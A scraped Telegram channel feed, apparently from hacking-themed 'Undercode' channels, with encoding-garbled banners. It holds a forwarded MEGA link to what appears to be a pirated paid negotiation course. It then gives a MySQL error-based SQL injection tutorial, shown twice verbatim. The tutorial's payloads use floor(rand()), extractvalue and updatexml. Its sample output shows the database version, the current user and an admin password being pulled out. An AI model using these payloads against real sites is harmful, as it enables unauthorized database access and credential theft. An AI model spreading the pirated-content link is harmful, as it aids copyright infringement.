β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
π¦Pro Class - Chris Voss Teaches the Art of Negotiation β 7.6 GBβ
5 rates
https://mega.nz/folder/XslXwZBT#OP_1pb3eyX5WTTGy2DptsA
5 rates
https://mega.nz/folder/XslXwZBT#OP_1pb3eyX5WTTGy2DptsA
mega.nz
7.6 GB folder on MEGA
19 files
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦mysql injection error utilization method
This tutorial mainly introduces the relevant information summarized by the mysql injection error reporting method. Friends who need it can refer to
1οΈβ£Report an error through the floor
You can use the following code
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
> Examples are as follows:
First, make a normal query:
mysql> select * from article where id = 1;
+β-+ββ-+βββ+
| id | title | content |
+β-+ββ-+βββ+
| 1 | test | do it |
+β-+ββ-+βββ+
If the id input is injected, you can report an error with the following statement.
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key'group_key'
You can see that the version of Mysql has been successfully released. If you need to query other data, you can query by modifying the statement where version() is located.
For example, we need to query the administrator username and password:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)* 2)));
ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'
2οΈβ£ExtractValue
The test statement is as follows
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual testing process
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));β
ERROR 1105 (HY000): XPATH syntax error:'\admin888'
3οΈβ£ UpdateXml
Test statement
and 1=(updatexml(1,concat(0x3a,(select user())),1))
Actual testing process
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error:':root@localhost'
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦mysql injection error utilization method
This tutorial mainly introduces the relevant information summarized by the mysql injection error reporting method. Friends who need it can refer to
1οΈβ£Report an error through the floor
You can use the following code
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
> Examples are as follows:
First, make a normal query:
mysql> select * from article where id = 1;
+β-+ββ-+βββ+
| id | title | content |
+β-+ββ-+βββ+
| 1 | test | do it |
+β-+ββ-+βββ+
If the id input is injected, you can report an error with the following statement.
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key'group_key'
You can see that the version of Mysql has been successfully released. If you need to query other data, you can query by modifying the statement where version() is located.
For example, we need to query the administrator username and password:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)* 2)));
ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'
2οΈβ£ExtractValue
The test statement is as follows
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual testing process
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));β
ERROR 1105 (HY000): XPATH syntax error:'\admin888'
3οΈβ£ UpdateXml
Test statement
and 1=(updatexml(1,concat(0x3a,(select user())),1))
Actual testing process
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error:':root@localhost'
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β